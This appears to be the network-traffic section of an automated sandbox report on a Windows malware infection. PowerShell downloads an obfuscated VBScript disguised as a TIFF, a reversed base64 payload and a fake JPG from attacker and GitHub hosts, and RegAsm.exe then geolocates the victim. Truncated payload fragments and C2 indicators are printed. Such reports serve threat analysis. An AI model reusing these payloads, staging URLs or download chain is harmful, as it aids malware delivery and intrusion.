                                                                                Oct 17, 2024 16:05:04.805850983 CEST1.1.1.1192.168.2.50x5fc4No error (0)dantata.duckdns.org192.3.101.153A (IP address)IN (0x0001)false
                                                                                Oct 17, 2024 16:05:06.728346109 CEST1.1.1.1192.168.2.50x1bb6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                • raw.githubusercontent.com
                                                                                • 107.175.229.138
                                                                                • geoplugin.net
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549704107.175.229.138804408C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 17, 2024 16:04:39.211605072 CEST327OUTGET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: 107.175.229.138
                                                                                Connection: Keep-Alive
                                                                                Oct 17, 2024 16:04:39.476032972 CEST327OUTGET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: 107.175.229.138
                                                                                Connection: Keep-Alive
                                                                                Oct 17, 2024 16:04:39.783494949 CEST327OUTGET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: 107.175.229.138
                                                                                Connection: Keep-Alive
                                                                                Oct 17, 2024 16:04:40.392834902 CEST327OUTGET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: 107.175.229.138
                                                                                Connection: Keep-Alive
                                                                                Oct 17, 2024 16:04:41.063677073 CEST1236INHTTP/1.1 200 OK
                                                                                Date: Thu, 17 Oct 2024 14:04:40 GMT
                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                Last-Modified: Thu, 17 Oct 2024 08:32:14 GMT
                                                                                ETag: "2fcf4-624a806096725"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 195828
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: image/tiff
                                                                                Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 69 00 78 00 6f 00 72 00 61 00 28 00 73 00 69 00 67 00 6d 00 61 00 74 00 69 00 73 00 6d 00 6f 00 2c 00 20 00 74 00 72 00 69 00 63 00 6f 00 64 00 65 00 73 00 6d 00 6f 00 2c 00 20 00 61 00 63 00 61 00 74 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 2c 00 20 00 70 00 61 00 69 00 61 00 6e 00 61 00 73 00 2c 00 20 00 6f 00 72 00 64 00 65 00 6e 00 61 00 64 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 [TRUNCATED]
                                                                                Data Ascii: private function ixora(sigmatismo, tricodesmo, acatamento, paianas, ordenado) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if acatamento.ArgumentExists(NPARA_FILTER) then filter = acatamento.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if acatamento.ArgumentExists(NPARA_DIALECT) then dialect = acatamento.Argument(NPARA_DI
                                                                                Oct 17, 2024 16:04:41.063755989 CEST1236INData Raw: 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 64 00 69
                                                                                Data Ascii: ALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbem/wsman/
                                                                                Oct 17, 2024 16:04:41.063766003 CEST1236INData Raw: 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22 00 20 00 26 00 20 00 45 00 73 00 63 00 61 00 70 00 65 00 28 00 6e
                                                                                Data Ascii: ter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next filter
                                                                                Oct 17, 2024 16:04:41.063776970 CEST1236INData Raw: 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 20 00 26 00 20 00 22 00 20 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 20 00 69 00 73
                                                                                Data Ascii: alse, "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (acatamento.Argumen
                                                                                Oct 17, 2024 16:04:41.063788891 CEST1236INData Raw: 00 20 00 20 00 20 00 69 00 66 00 20 00 61 00 63 00 61 00 74 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52 00 45 00 54
                                                                                Data Ascii: if acatamento.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(acatamento.Argument(NPARA_RETURN_TYPE)
                                                                                Oct 17, 2024 16:04:41.063801050 CEST1236INData Raw: 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 53 00 48 00 41 00 4c 00 4c 00 4f 00 57 00 29 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d
                                                                                Data Ascii: sts(NPARA_SHALLOW)) then flags = flags OR sigmatismo.EnumerationFlagHierarchyShallow elseif (acatamento.Arg
                                                                                Oct 17, 2024 16:04:41.063813925 CEST1236INData Raw: 00 74 00 2c 00 20 00 66 00 6c 00 61 00 67 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20
                                                                                Data Ascii: t, flags) end if end if ASSERTERR tricodesmo, ordenado on error goto 0 if acatamento.A
                                                                                Oct 17, 2024 16:04:41.063985109 CEST1236INData Raw: 00 65 00 2e 00 52 00 65 00 61 00 64 00 49 00 74 00 65 00 6d 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                Data Ascii: e.ReadItem() end if end if if Err.Number <> 0 then stdErr.WriteLine e.Error
                                                                                Oct 17, 2024 16:04:41.063996077 CEST1236INData Raw: 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 78 00 6f 00 72 00 61 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 65 00 6e 00 64 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 6f 00 57 00 5a 00 75 00 52 00 68 00 6c 00 52
                                                                                Data Ascii: ixora = ""end functionoWZuRhlRzNUKAZQ = "zKKKrfULfWthxfi"KzLfritalhadaxGOnCUtzmc = "OWLiImKmjqkaPoK"lzGbel
                                                                                Oct 17, 2024 16:04:41.064007044 CEST1236INData Raw: 00 42 00 62 00 4c 00 57 00 69 00 4a 00 67 00 69 00 4b 00 78 00 63 00 55 00 55 00 52 00 22 00 0d 00 0a 00 57 00 4c 00 4e 00 75 00 52 00 69 00 61 00 62 00 57 00 6f 00 68 00 73 00 47 00 6a 00 6b 00 20 00 3d 00 20 00 22 00 6b 00 71 00 66 00 57 00 78
                                                                                Data Ascii: BbLWiJgiKxcUUR"WLNuRiabWohsGjk = "kqfWxOeHtWGpubK"bizjozdmiUjmpRf = "RkdbbKkczKLKBUL"cZkotJuLcWHBpaL = "WnLLaKmjAtP
                                                                                Oct 17, 2024 16:04:41.101548910 CEST1236INData Raw: 00 22 00 0d 00 0a 00 69 00 4e 00 69 00 48 00 5a 00 6b 00 5a 00 4c 00 74 00 57 00 68 00 6e 00 41 00 50 00 5a 00 20 00 3d 00 20 00 22 00 57 00 43 00 4b 00 71 00 64 00 66 00 70 00 63 00 75 00 4e 00 52 00 69 00 5a 00 70 00 72 00 22 00 0d 00 0a 00 69
                                                                                Data Ascii: "iNiHZkZLtWhnAPZ = "WCKqdfpcuNRiZpr"iAZKuKOoPfxzchb = "aLcKLaPxuKGKpkq"PkgWfkOKWGBPCbk = "UZasdhLcWorehUc"OPCAZHk


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549715107.175.229.138801476C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 17, 2024 16:04:55.809577942 CEST79OUTGET /550/MNCCDR.txt HTTP/1.1
                                                                                Host: 107.175.229.138
                                                                                Connection: Keep-Alive
                                                                                Oct 17, 2024 16:04:56.080353022 CEST79OUTGET /550/MNCCDR.txt HTTP/1.1
                                                                                Host: 107.175.229.138
                                                                                Connection: Keep-Alive
                                                                                Oct 17, 2024 16:04:56.963545084 CEST1236INHTTP/1.1 200 OK
                                                                                Date: Thu, 17 Oct 2024 14:04:56 GMT
                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                Last-Modified: Thu, 17 Oct 2024 08:29:29 GMT
                                                                                ETag: "a1000-624a7fc352999"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 659456
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/plain
                                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                Oct 17, 2024 16:04:56.963565111 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                Oct 17, 2024 16:04:56.963577032 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                Oct 17, 2024 16:04:56.963588953 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                Oct 17, 2024 16:04:56.963602066 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                Oct 17, 2024 16:04:56.963613033 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                                                Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                                                Oct 17, 2024 16:04:56.963624001 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                                                Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                                                Oct 17, 2024 16:04:56.963634968 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                                                Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                                                Oct 17, 2024 16:04:56.963646889 CEST1236INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                                                Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                                                Oct 17, 2024 16:04:56.963660002 CEST1236INData Raw: 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45
                                                                                Data Ascii: UKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKP
                                                                                Oct 17, 2024 16:04:56.995837927 CEST708INData Raw: 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61 4f 5a 6d 7a 62 35 55 57 4f 65 6c 7a
                                                                                Data Ascii: szA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyNLYzu24qNgaTj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549731178.237.33.50805940C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 17, 2024 16:05:21.976512909 CEST71OUTGET /json.gp HTTP/1.1
                                                                                Host: geoplugin.net
                                                                                Cache-Control: no-cache
                                                                                Oct 17, 2024 16:05:22.831347942 CEST1165INHTTP/1.1 200 OK
                                                                                date: Thu, 17 Oct 2024 14:05:22 GMT
                                                                                server: Apache
                                                                                content-length: 957
                                                                                content-type: application/json; charset=utf-8
                                                                                cache-control: public, max-age=300
                                                                                access-control-allow-origin: *
                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                Data Ascii: { "geoplugin_request":"173.254.250.82", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549706185.199.108.1334431476C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-17 14:04:49 UTC134OUTGET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-10-17 14:04:49 UTC899INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 6331693
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: application/octet-stream
                                                                                ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: BCA9:2809FC:4A3FF:51462:6708DD5C
                                                                                Accept-Ranges: bytes
                                                                                Date: Thu, 17 Oct 2024 14:04:49 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-dfw-kdal2120097-DFW
                                                                                X-Cache: HIT
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1729173889.401553,VS0,VE31
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 1ed7b73faf24b515f82c4ff43da7858d5012532e
                                                                                Expires: Thu, 17 Oct 2024 14:09:49 GMT
                                                                                Source-Age: 0
